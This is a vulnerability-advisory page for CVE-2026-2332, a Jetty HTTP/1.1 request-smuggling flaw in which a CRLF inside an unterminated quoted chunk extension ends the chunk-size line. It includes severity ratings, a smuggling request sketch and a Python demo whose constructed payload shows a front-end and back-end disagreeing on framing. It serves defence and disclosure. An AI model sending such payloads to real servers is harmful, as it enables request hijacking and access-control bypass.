
Eclipse Jetty · EUVD-2026-22243

CVE-2026-2332 CRITICAL
HTTP Request/Response Smuggling (CWE-444)
2026-04-14 eclipse GHSA-355h-qmc2-wpwf
9.1
CVSS 3.1 · NVD

Severity by source

NVD PRIMARY
9.1 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
vuln.today AI
8.7 HIGH

Network, unauthenticated, no UI, but realistic exploitation needs a parsing-divergent front-end (AC:H); smuggling crosses a trust boundary into a separate component (S:C) with high confidentiality/integrity impact and no availability impact.

CVSS 3.1: AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N
CVSS 4.0: AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
SUSE
7.4 HIGH
AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
Red Hat
7.4 HIGH
qualitative rating

Primary rating from NVD.

CVSS Vector (NVD)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
None

Lifecycle Timeline

13 events
Analysis Updated
Jun 30, 2026 - 03:49 vuln.today
v5 (cvss_changed)
Source Code Evidence Fetched
Jun 30, 2026 - 03:46 vuln.today
Analysis Updated
Jun 30, 2026 - 03:46 vuln.today
v4 (cvss_changed)
Analysis Updated
Jun 30, 2026 - 03:46 vuln.today
v3 (cvss_changed)
Analysis Updated
Jun 30, 2026 - 03:46 vuln.today
v2 (cvss_changed)
Severity Changed
Jun 30, 2026 - 03:24 NVD
HIGH → CRITICAL
CVSS changed
Jun 30, 2026 - 03:24 NVD
7.4 (HIGH) → 9.1 (CRITICAL)
Re-analysis Queued
Apr 17, 2026 - 15:37 vuln.today
cvss_changed
Patch released
Apr 15, 2026 - 02:30 nvd
Patch available
Analysis Generated
Apr 14, 2026 - 12:14 vuln.today
EUVD ID Assigned
Apr 14, 2026 - 11:30 euvd
EUVD-2026-22243
Analysis Generated
Apr 14, 2026 - 11:30 vuln.today
CVE Published
Apr 14, 2026 - 10:59 nvd
HIGH 7.4

Blast Radius

Ecosystem impact (transitive dependency graph, resolved by vuln.today to a depth of 4):
  • 243 maven packages depend on org.eclipse.jetty:jetty-http (25 direct, 218 indirect)

Ecosystem-wide dependent count for version 12.1.0.

Description (NVD)

In Eclipse Jetty, the HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used, similar to the "funky chunks" techniques outlined here:

  • https://w4ke.info/2025/06/18/funky-chunks.html
  • https://w4ke.info/2025/10/29/funky-chunks-2.html

Jetty terminates chunk extension parsing at \r\n inside quoted strings instead of treating this as an error.

  POST / HTTP/1.1
  Host: localhost
  Transfer-Encoding: chunked

  1;ext="val
  X
  0

  GET /smuggled HTTP/1.1
  ...

Note how the chunk extension does not close the double quotes, and it is able to inject a smuggled request.
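The parser divergence the advisory describes, as an added Python example that is not Jetty's code and not code from the advisory: three toy HTTP/1.1 framers read the same constructed connection bytes. The `crlf` mode reproduces the pre-fix behaviour (the chunk-size line ends at the first CRLF even inside an open quoted-string), the `quoted` mode is a hypothetical front-end that keeps the quoted-string open across the CRLF until its closing quote, and the `strict` mode rejects the request, which is the behaviour the advisory says a parser should have. The payload extends the advisory's sketch with a closing quote in a header of the smuggled request and with a 3-byte chunk and 8-byte Content-Length so that each lenient parser consumes the whole stream; those values, the `X` header and the `/smuggled` request body are constructed for the demonstration.

```python
# Toy HTTP/1.1 framers showing the chunk-extension quoted-string divergence (constructed example).
CRLF = b"\r\n"
HEX = b"0123456789abcdefABCDEF"

class FramingError(Exception):
    """The parser refuses the stream; a hardened server answers 400 and closes the connection."""

def _scan_chunk_size_line(buf: bytes, pos: int, mode: str) -> tuple[int, int]:
    """Parse the chunk-size line at pos -> (chunk size, offset just past its CRLF).

    "crlf":   line ends at the first CRLF even inside an open quoted-string (pre-fix behaviour).
    "quoted": a quoted-string stays open across CRLF until its closing quote (hypothetical front-end).
    "strict": CR or LF inside a quoted-string is a framing error (hardened behaviour).
    """
    if mode == "crlf":
        end = buf.find(CRLF, pos)
        if end < 0:
            raise FramingError("truncated chunk-size line")
        return int(buf[pos:end].split(b";", 1)[0].strip(), 16), end + 2
    size_end = pos
    while size_end < len(buf) and buf[size_end] in HEX:
        size_end += 1
    if size_end == pos:
        raise FramingError("missing chunk size")
    size, i, in_quotes = int(buf[pos:size_end], 16), size_end, False
    while i < len(buf):
        c = buf[i:i + 1]
        if in_quotes and c == b"\\":            # quoted-pair: the next octet is literal
            i += 2
            continue
        if c == b'"':
            in_quotes = not in_quotes
        elif not in_quotes and buf[i:i + 2] == CRLF:
            return size, i + 2
        elif in_quotes and c in (b"\r", b"\n") and mode == "strict":
            raise FramingError("CR/LF inside quoted chunk extension")
        i += 1
    raise FramingError("truncated chunk-size line")

def _read_chunked_body(buf: bytes, pos: int, mode: str) -> tuple[bytes, int]:
    """Decode a chunked body at pos -> (body, offset after the empty trailer line)."""
    body = bytearray()
    while True:
        size, pos = _scan_chunk_size_line(buf, pos, mode)
        if size == 0:                            # last-chunk; no trailers in this example
            if buf[pos:pos + 2] != CRLF:
                raise FramingError("bad trailer section")
            return bytes(body), pos + 2
        if pos + size > len(buf) or buf[pos + size:pos + size + 2] != CRLF:
            raise FramingError("chunk data not followed by CRLF")
        body += buf[pos:pos + size]
        pos += size + 2

def frame_requests(stream: bytes, mode: str) -> list[tuple[bytes, bytes]]:
    """Split one connection's bytes into (request line, body) pairs as `mode` frames them."""
    out, pos = [], 0
    while pos < len(stream):
        hdr_end = stream.find(CRLF + CRLF, pos)
        if hdr_end < 0:
            raise FramingError("incomplete headers")
        lines = stream[pos:hdr_end].split(CRLF)
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(b":")
            headers[name.strip().lower()] = value.strip()
        pos = hdr_end + 4
        if headers.get(b"transfer-encoding", b"").lower() == b"chunked":
            body, pos = _read_chunked_body(stream, pos, mode)
        else:
            n = int(headers.get(b"content-length", b"0"))
            body, pos = stream[pos:pos + n], pos + n
        out.append((lines[0], body))
    return out

# Constructed payload (not from the advisory): the advisory's unterminated `ext="val`, plus a closing
# quote in the smuggled request's X header and sizes chosen so each lenient parser consumes everything.
PAYLOAD = (
    b"POST / HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: chunked\r\n\r\n"
    b'3;ext="val\r\n'        # "crlf" ends the chunk-size line here; "quoted" reads on
    b"XYZ\r\n0\r\n\r\n"      # back-end ("crlf"): 3-byte chunk, last-chunk, empty trailers
    b"GET /smuggled HTTP/1.1\r\nHost: localhost\r\nContent-Length: 8\r\n"
    b'X: "\r\n'              # the closing quote: "quoted" ends its chunk-size line here
    b"\r\nA\r\n0\r\n\r\n"    # "quoted": chunk b"\r\nA" then last-chunk; "crlf": the 8-byte body
)

def demo() -> dict:
    """Request lines each parser sees for PAYLOAD, or the reason it rejected the stream."""
    views = {}
    for mode in ("quoted", "crlf", "strict"):
        try:
            views[mode] = [line.decode() for line, _ in frame_requests(PAYLOAD, mode)]
        except FramingError as exc:
            views[mode] = f"rejected: {exc}"
    return views

if __name__ == "__main__":
    print(demo())
```

Running it, the `quoted` view contains one POST while the `crlf` view contains that POST followed by `GET /smuggled`; the second request was framed by the back-end alone and never existed for the front-end, which is the trust-boundary crossing the severity rationale above refers to. The `strict` branch fails the request instead of guessing where the chunk-size line ends; a front-end that normalises or rejects quoted-string chunk extensions before forwarding gives the same protection while a back-end is awaiting the patch.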

Analysis (AI)

HTTP request smuggling in Eclipse Jetty's HTTP/1.1 parser lets remote unauthenticated attackers desynchronize front-end/back-end request boundaries by abusing quoted-string chunk extensions. Jetty incorrectly terminates chunk-extension parsing at a CRLF located inside an unterminated quoted-string (e.g. …


Recommended Action (AI)

Within 24 hours: inventory all systems running Eclipse Jetty and identify internet-exposed instances. …


Vendor Status

SUSE

Severity: High
Product Status
SUSE Linux Enterprise Desktop 15 SP7 Fixed
SUSE Linux Enterprise High Performance Computing 15 SP7 Fixed
SUSE Linux Enterprise Module for Development Tools 15 SP7 Fixed
SUSE Linux Enterprise Module for Package Hub 15 SP7 Fixed
SUSE Linux Enterprise Server 15 SP7 Fixed
